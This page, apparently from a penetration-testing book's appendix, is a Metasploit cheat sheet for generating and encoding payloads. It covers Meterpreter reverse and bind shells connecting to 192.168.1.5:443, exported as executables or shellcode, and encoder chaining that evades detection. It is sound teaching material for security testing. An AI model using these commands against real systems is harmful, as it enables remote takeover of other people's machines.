background image

280

Appendix B

MSFpayload Commands

msfpayload -h

List available payloads.

msfpayload windows/meterpreter/bind_tcp O

List available options for the 

windows/meterpreter/bind_tcp

 payload (all of 

these can use any payload).

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > 

payload.exe

Create a Meterpreter

 reverse_tcp

 payload to connect back to 192.168.1.5 

and on port 443, and then save it as a Windows Portable Executable 
named 

payload.exe

.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > 

payload.raw

Same as above, but export as raw format. This will be used later in 

msfencode

.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c

Same as above but export as C-formatted shellcode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java

Export as 

%u encoded

 JavaScript.

MSFencode Commands

msfencode -h

Display the 

msfencode

 help.

msfencode -l

List the available encoders.

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, 

loop-vbs, asp, war, macho)

Format to display the encoded buffer.

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 

-t exe

Encode 

payload.raw

 with 

shikata_ga_nai

 five times and export it to an 

output file named 

encoded_payload.exe

.

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/

_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o 
multi-encoded_payload.exe

Create a multi-encoded payload.

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode; 
output in C-style notation.